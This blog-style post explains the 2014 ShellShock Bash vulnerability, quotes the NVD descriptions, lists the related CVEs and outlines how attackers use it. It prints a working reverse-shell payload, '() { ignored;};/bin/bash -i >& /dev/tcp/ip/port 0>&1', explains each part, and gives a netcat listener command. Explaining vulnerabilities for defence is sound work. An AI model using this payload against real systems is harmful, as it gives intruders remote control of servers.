Exploiting ShellShock getting a reverse shell

A Bash Vulnerability (aka ShellShock) has been published two months ago (CVE-2014-6271 original release date 09/24/2014) reaching the highest score for Impact and Exploitability by NIST-NVD with the following overview:

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

The first patch released was partial and introduced another vulnerability (CVE-2014-7169 original release date 09/24/2014)  again with top score for Impact and Exploitability by NIST-NVD with the following overview (highlight is mine):

GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271

Two months after, ShellShock is still on the wild, used to exploit thousands systems all around the net, installing php/perl/irc shell or any other malicious payload. This is possible because the original SehellShock vulnerability is now related to other five CVEs:

  • CVE-2014-6271 (Initial report)
  • CVE-2014-6277
  • CVE-2014-6278
  • CVE-2014-7169
  • CVE-2014-7186
  • CVE-2014-7187

The following image, taken from F5 Website, explain how ShellShock works and why it is very dangerous:

She

Basically,exploiting this vulnerability, you can run every command (or every commands sequence) , but in 90% of cases I found the final target as a shell installation, usually in five steps:

  1. Vulnerability exploiting
  2. Script (perl, bash, c, etc…) download from a remote site via wget, curl, etc…
  3. Script saving under /tmp
  4. Script execution
  5. Cleaning (remove /tmp original file)

In many cases this approach will fail because perl/php/c shell are detected and removed by security safeguards used to protect systems and remote sites could be blocked by Web Filtering policies. In recent days, however, I noticed a specific attack that does not use any malicious code, but only a system script:

() { ignored;};/bin/bash -i >& /dev/tcp/ip/port 0>&1

Let me explain better:

() { ignored;}; is the ShellShock exploit
/bin/bash -i is an interactive Bash session
>& /dev/tcp/ip/port redirect standard output and standard error to the remote host (i.e.: /dev/tcp/1.2.3.4/8080 redirect the bash session to IP 1.2.3.4 on TCP port 8080)
0>&1 read the satndard input. This should be 0<&1 but it works well in both cases

On the remote server a listener must be running: for testing I used  nc -l 8080 (netcat listening on port 8080)

This is a very interesting approach about exploiting ShellShock getting a reverse shell :)